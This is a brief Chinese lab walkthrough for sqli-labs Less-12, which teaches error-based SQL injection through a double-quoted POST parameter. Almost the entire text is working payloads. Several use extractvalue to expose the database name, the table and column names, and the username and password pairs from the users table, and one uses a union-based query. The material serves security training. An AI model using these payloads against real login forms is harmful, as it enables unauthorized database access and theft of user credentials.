Less-12基于错误的双引号POST字符型变形的注入
方式一 extractvalue报错型
1、爆开数据库
payload "*"
达到sql注入查询语句闭合!用--+
反而不行
name=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
2、爆开数据表
payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit
3、爆开数据表
payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit
4、表开数据列(字段)
payload
uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit
方式二 union联合注入查询
爆开数据库表
uname=0") union select 1,database() --+ &passwd=admin&submit=Submit